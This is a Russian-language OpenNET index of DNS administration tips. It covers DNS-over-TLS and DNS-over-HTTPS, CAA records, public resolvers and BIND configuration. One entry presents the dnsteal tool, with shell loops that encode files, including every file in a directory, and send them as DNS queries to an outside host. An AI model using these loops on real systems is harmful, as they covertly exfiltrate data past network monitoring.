The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

DNS

   Корень / Администратору / Сетевые сервисы / DNS

----* Организация шифрованного доступа к DNS-серверу BIND (DNS-over-TLS) при помощи nginx  (доп. ссылка 1)   [комментарии]
  Для предоставления клиентам возможности доступа к DNS-серверу на основе BIND с использованием протокола DNS-over-TLS можно настроить TLS-прокси с использованием nginx.
...
[Слишком большой объем текста. Скрыт. Для просмотра см. продолжение
]
 
----* Защита от подмены серверных TLS-сертификатов в результате MITM-атаки провайдером (доп. ссылка 1) (доп. ссылка 2)   [комментарии]
 
Для предотвращения получения TLS-сертификатов третьими лицами, которые в ходе
MITM-атаки могут контролировать трафик сервера, рекомендовано использовать
DNS-запись CAA, через которую можно указать какой именно удостоверяющий центр и
какая именно учётная запись в этом удостоверяющем центре авторизированы на
выдачу сертификата для домена.

CAA поддерживается в Let's Encrypt и не позволяет запросить сертификат,
используя другой ACME-ключ. Для включения привязки в DNS-зону следует добавить:

для привязки домена example.com к удостоверяющему центру letsencrypt.org:

   example.com. IN CAA 0 issue "letsencrypt.org"

для дополнительно привязки к учётной записи acme-v02.api.letsencrypt.org/acme/acct/1234567890

   example.com. IN CAA 0 issue "letsencrypt.org; accounturi=https://acme-v02.api.letsencrypt.org/acme/acct/1234567890"

DNS-сервер должен быть размещён на отдельном сервере, не подверженном
MITM-атаке. Для дополнительной защиты от подмены DNS необходимо использовать
протокол DNSSEC, который помешает атакующим подменить  DNS-ответы с записью CAA.

Дополнительно рекомендовано через Tor или внешние хосты наладить автоматический
мониторинг  отсутствия подмены сертификатов, и подключиться к сервисам
мониторинга CT-логов (Certificate Transparency, отражают выданные
удостоверяющими центрами сертификаты) или вручную отслеживать появление
незапрошенных сертификатов в CT-логах (https://crt.sh/). Также  рекомендовано
выбирать размещённых в разных странах операторов хостинга, регистрации домена,
DNS и удостоверяющих центров.
 
----* Включение DNS over TLS в Fedora (доп. ссылка 1)   [комментарии]
  Включаем DNSOverTLS в настройках systemd-resolved. /etc/systemd/resolved.conf
...
[Слишком большой объем текста. Скрыт. Для просмотра см. продолжение
]
 
----* Включение DNS-over-HTTPS в Chrome (доп. ссылка 1)   [комментарии]
  В феврале в кодовую базу Chromium без лишней огласки была [[https://chromium.googlesource.com/chromium/src.git/+/786929ad1cfbc97962ff5672e2469460ff535f41 добавлена]] недокументированная возможность использования DNS-over-HTTPS (DoH). Если в обычной ситуации DNS-запросы напрямую отправляются на определённые в конфигурации системы DNS-серверы, то в случае DoH запрос на определение IP-адреса хоста инкапсулируется в трафик HTTPS и отправляется на HTTP-сервер, на котором резолвер обрабатывает запросы через Web API. Существующий стандарт DNSSEC использует шифрование лишь для аутентификации клиента и сервера, но не защищает трафик от перехвата и не гарантирует конфиденциальность запросов.
...
[Слишком большой объем текста. Скрыт. Для просмотра см. продолжение
]
 
----* Список общедоступных DNS-резолверов   [комментарии]
 
  • 8.8.8.8, 8.8.4.4 - Google (поддерживается DNS over TLS)
  • 1.1.1.1, 1.0.0.1 - CloudFlare (поддерживается DNS over TLS)
  • 9.9.9.9, 149.112.112.112 - Quad9 (блокируются вредоносные хосты и поддерживается DNS over TLS)
  • 77.88.8.7, 77.88.8.3 - Yandex (блокируются вредоносные хосты)
  • 208.67.222.222, 208.67.220.220 - OpenDNS/Cisco (блокируются вредоносные хосты и сайты для взрослых, поддерживается DNSCrypt и DNS over TLS))
  • 8.26.56.26, 8.20.247.20 - Comodo (блокируются вредоносные хосты, поддерживается DNSCrypt и DNS over TLS)
  • 185.228.168.168, 185.228.169.168 - CleanBrowsing.org (блокируется хосты с сайтами для взрослых, поддерживается DNSCrypt)
  • 84.200.69.80, 84.200.70.40 - DNS Watch (не ведутся логи)
  • 37.235.1.174, 37.235.1.177 - FreeDNS (не ведутся логи)
  • 45.77.165.194, 45.32.36.36 - Fourth Estate (не ведутся логи)
  • 91.239.100.100, 89.233.43.71 - UncensoredDNS (первый anycast, второй размещён в Дании)
  • 64.6.64.6, 64.6.65.6 - Verisign
  • 4.2.2.[1-6] - Level 3 Communications (4.2.2.1 - 4.2.2.6)
  •  
    ----* Включение ESNI и DNS over HTTPS в Firefox (доп. ссылка 1)   [комментарии]
      Включения network.security.esni.enabled=true в about:config недостаточно для активации в Firefox TLS-расширения ESNI (Encrypted Server Name Indication), обеспечивающего шифрование данных о хосте, запрашиваемом в рамках HTTPS-соединения.
    ...
    [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение
    ]
     
    ----* Скрытая отправка файлов через DNS   [комментарии]
     
    В рамках проекта https://github.com/m57/dnsteal развивается фиктивный
    DNS-сервер, позволяющий организовать скрытую отправку файлов по протоколу DNS,
    используя штатные системные утилиты резолвинга. Для уменьшения трафика
    поддерживается сжатие передаваемого содержимого.
    
    
    Запускаем сервер ("-z" - включает сжатие):
    
       python dnsteal.py 192.168.1.1 -z
    
    
    Для отправки файла send.txt на внешний хост 192.168.1.1, на котором запущен
    dnsteal, достаточно выполнить:
    
       for b in $(gzip -c send.txt | xxd -p); do dig @192.168.1.1 $b.filename.com; done
    
    Для отправки всех файлов из текущей директории
    
       for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @192.168.1.1 %b.$filename.com; done; done
    
     
    ----* Настройка CustomDNS (DynDNS) на маршрутизаторе Cisco   Автор: serg-dn  [комментарии]
      Шаблон настроек Cisco IOS для обновления хоста MyHost своего домена My-DNS-Domain.com в DynDNS. Конфигурация для ADSL. Проверено на Cisco IOS Software, C870 Software (C870-ADVIPSERVICESK9-M), Version 12.4(24)T4. Для обновления раз в час необходима подписка на услугу DynDNS Pro, для корректной регистрации должна быть активирована услуга Custom DNS.
    ...
    [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение
    ]
     
    ----* Организация работы Opera и других приложений через Socks (доп. ссылка 1)   [комментарии]
      Если на локальной машине кроме socks имеется выход в интернет или доступ к DNS-резолверу, проблем не возникает, но если выход машины производится только через socks при запуске программ подобных браузеру opera всплывает неприятная проблема с резолвингом имен. Проблема в том, что утилиты подобные tsocks не позволяют перенаправлять DNS запросы через Socks и организовать работу резолвера поверх этого протокола.
    ...
    [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение
    ]
     
    ----* Настройка Dynamic DNS на базе Bind9 и nsupdate (доп. ссылка 1)   Автор: Stepanoff  [комментарии]
      В данном руководстве описано как настроить динамическое обновление зоны DNS с удаленной машины, например с DHCP сервера, или если адрес выдается динамически, как при использовании ADSL. Описано как простое обновление зоны вручную, или по крону, так и обновление зоны DHCP сервером при выдаче ip-адреса клиенту. Настройка идентична для всех дистрибутивов и ОС (Linux, FreeBSD, Mac OS и прочих систем где есть Bind9).
    ...
    [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение
    ]
     
    ----* Автоматизация создания массовых записей на DNS-сервере Bind   [комментарии]
      Для заведения типовых записей внутри DNS зоны, например, строк вида "adsl-1-2-3-4.pool.test.ru удобно использовать директиву "$GENERATE". При помощи $GENERATE можно массово создавать элементы для записей A, CNAME, DNAME, NS и PTR.
    ...
    [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение
    ]
     
    ----* Автоматическое изменение правил IPTABLES для IP адресов из записей DynDNS (доп. ссылка 1)   Автор: zaikini  [комментарии]
      Возникла задача предоставить сервис для клиентов, использующих внешние динамические адреса. Доступ к сервису ограничен правилами IPTABLES.
    ...
    [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение
    ]
     
    ----* Как удалить из кэша DNS сервера Bind конкретную запись, без перезагрузки всего кэша   Автор: Константин Брызгалов  [комментарии]
      Для удаления отдельной записи в кэше Bind нужно использовать команду "rndc flushname"
    ...
    [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение
    ]
     
    ----* MAC DNS лист   Автор: Vladimir Shingarev  [комментарии]
     
    Иногда нужно узнать какому производителю принадлежит оконечное оборудование, 
    наблюдая только его мак на интерфейсе. А открывать браузер для этого лениво.
    
    В таком случае удобно создать MAC-based dns лист. Пользоваться просто:
    
       ket:/home/sva# host -t txt 001243.macl.nov.ru
       001243.macl.nov.ru descriptive text "Cisco"
       ket:/home/sva# host -t txt 0050ba.macl.nov.ru
       0050ba.macl.nov.ru descriptive text "D-LINK"
    
     
    ----* DNS: Как делегировать неполную (не /24) сеть in-addr.arpa клиенту   Автор: nikl  [комментарии]
      Предположим, вы провайдер (provider1) и подключившийся к вам клиент (firma1) взял в пользование сеть /28 Как обеспечить ему самостоятельное управление обратными доменами в его подсети? Можно делигировать ему неполную сеть, на примере:
    ...
    [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение
    ]
     
    ----* Решение проблемы резолвинга при включенных forwarders в BIND 9   Автор: Vladimir V. Kamarzin  [комментарии]
      Если bind 9 одновременно является переадресующим сервером ( forwarders { s.o.m.e; }; ) и авторитативным для какой-либо зоны, при делегировании подзоны возникает проблема резолвинга хостов этой подзоны:
    ...
    [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение
    ]
     
    ----* Почему на некоторые запросы named слишком долго (1-4 сек.) резолвит имя (доп. ссылка 1)   [комментарии]
     
    Проблемы на IPv4 хостах без IPv6 коннективити, обусловлены появлением IPv6
    адресов у B и A корневых NS.
    
    Решение представлено в BIND 9.2.5 и 9.3.1, которые еще не вышли.
    Другой путь - собрать bind с ./configure --disable-ipv6 или запустить с опцией -4 (для bind 9.3.0).
    
     
    ----* Пример ведения расширенных логов в named   [комментарии]
      # named.conf # для более делаьной информации о трансферах расскомментируйте "severity info" logging {
    ...
    [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение
    ]
     
    ----* Настройка динамического обновления DNS зон. (доп. ссылка 1)   Автор: Jeff Garzik  [комментарии]
      Генерируем ключи:
    ...
    [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение
    ]
     
    ----* Оптимизация работы DNS резолвера, случайный выбор NS (доп. ссылка 1)   [обсудить]
     
    В /etc/resolv.conf:
       options attempts=2, timeout=2, rotate
       ,где attempts - число попыток посылки запроса к серверу.
            timeout - таймаут запроса (по умолчанию 5 сек.)
            rotate   случайный выбор nameserver из списка, а не опрос по порядку.
            timeout - таймаут за который сервер должен успеть ответить.
        Для отладки удобно использовать "options debug"
    
     
    ----* Как организовать рекурсивные запросы только через жестко определенные сервера.   [обсудить]
     
    options {
       # Если "first" - то если forwarders не ответил - запрашиваем сами.
       # Если "only" - сами никогда не запрашиваем, только через forwarders.
       forward only; 
       forwarders {192.168.1.1; 192.168.2.1;};
    };
    
     
    ----* Как запретить рекурсивные запросы через DNS сервер для чужих клиентов   [комментарии]
     
    acl localnet { 192.168.1.0/24; 10.0.1.0/24; };
    options {
       allow-recursion {localnet; 192.168.2.0/24};
       # Полностью запросы можно ограничить через "allow-query" или "blackhole"
    };
    
     
    ----* Как запретить Bind показывать свою версию для внешнего мира. (доп. ссылка 1)   [комментарии]
     
    Узнать версию можно через:
      dig @ns.test.ru version.bind chaos txt
    Чтобы запретить, нужно в options блоке named.conf прописать:
      options {
        ...
        version "0.1";
      };
    
     
    ----* Как разрешить полный трансфер DNS зоны только для избранных серверов.   [обсудить]
     
    zone "host.ru" {
            type master;
            allow-transfer { 1.2.3.4; 1.2.3.5; 1.2.3.6;};
            file "host.ru";
    }
    
     
    ----* Как избавиться от ограничения числа одновременных коннектов к named   [обсудить]
     
    options {
            directory "/etc/namedb";
            recursive-clients 5000;
            tcp-clients 500;
    };
    
     
    ----* Включение DNS-over-HTTPS на системном уровне в KDE neon и Ubuntu   Автор: popov895  [комментарии]
      В этой заметке я не буду объяснять, [[https://www.google.com/search?channel=fs&client=ubuntu&q=why+should+i+use+doh почему]] предпочтительно использовать DNS-over-HTTPS (DoH), а просто опишу, как его можно включить на системном уровне в KDE neon / Ubuntu. [[B]]Внимание: не забывайте делать резервные копии системных файлов, которые планируете редактировать![[/B]]
    ...
    [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение
    ]
     
    ----* Настройка DNSSEC в BIND 9.9 (доп. ссылка 1) (доп. ссылка 2)   [комментарии]
      В [[http://www.opennet.ru/opennews/art.shtml?num=33229 BIND 9.9]] появились новые средства для автоматизации формирования цифровых подписей и управления ключами, позволяющие добавить поддержку DNSSEC без правки DNS-зон.
    ...
    [Слишком большой объем текста. Скрыт. Для просмотра см. продолжение
    ]
     
    ----* Как в DNS прописать два образа одной и той же зоны для внутренней и внешней сети.   Автор: uldus  [комментарии]
     
     view "internal" {
        match-clients { 192.168.0.0/16; };
        zone "test.ru" {
             type master;
             file "test.ru.int";
        };
     };
     view "external" {
        match-clients { any; };
        zone "test.ru" {
             type master;
             file "test.ru.ext";
        };
     };
    
     

     Версия для печати





    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру